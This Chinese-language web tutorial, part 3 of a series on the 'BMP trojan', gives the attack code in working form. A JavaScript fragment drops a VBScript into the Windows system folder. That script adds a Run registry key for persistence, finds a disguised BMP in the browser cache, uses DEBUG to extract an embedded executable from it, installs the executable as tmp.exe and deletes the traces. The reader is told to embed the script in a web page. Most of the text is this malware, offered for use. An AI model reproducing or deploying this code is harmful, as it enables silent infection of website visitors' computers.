详解BMP木马(3)
st.WriteLine( Lt.Close);
st.WriteLine( WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6);
st.WriteLine( On Error Resume Next );
st.WriteLine( FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe"));
st.WriteLine( FSO.GetFile(tmp & "tmp.dat").Delete);
st.WriteLine( FSO.GetFile(tmp & "tmp.in").Delete);
st.WriteLine( FSO.GetFile(tmp & "tmp.out").Delete);
st.WriteLine( end if);
st.WriteLine( If Folder.SubFolders.Count <> 0 Then);
st.WriteLine( For Each SubFolder In Folder.SubFolders);
st.WriteLine( SearchBMPFile SubFolder,fname);
st.WriteLine( Next);
st.WriteLine( End If);
st.WriteLine(End Function);
st.Close();
}
setTimeout(docsave(),1000);
把该脚本保存为"js.js",在网页中插入:
该脚本主要会在本地机器的SYSTEM目录下生成一个“S.VBS”文件,该脚本文件会在下次开机时自动运行。主要用于从临时目录中找出mybmp[1].bmp文件。
“S.VBS”文件主要内容如下:
Option Explicit
Dim FSO,WSH,CACHE,str
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache")
wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe"
SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"
WScript.Quit()
Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
从临时文件夹中查找目标BMP图片
str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
File.Delete
生成一个DEBUG脚本
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine("rcx")
下面一行的1000是十六进制,换回十进制是4096(该数字是你的EXE文件的大小)
Lt.WriteLine("1000")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp &"tmp.in>" & tmp & "tmp.out",false,6
内容版权声明:除非注明,否则皆为本站原创文章。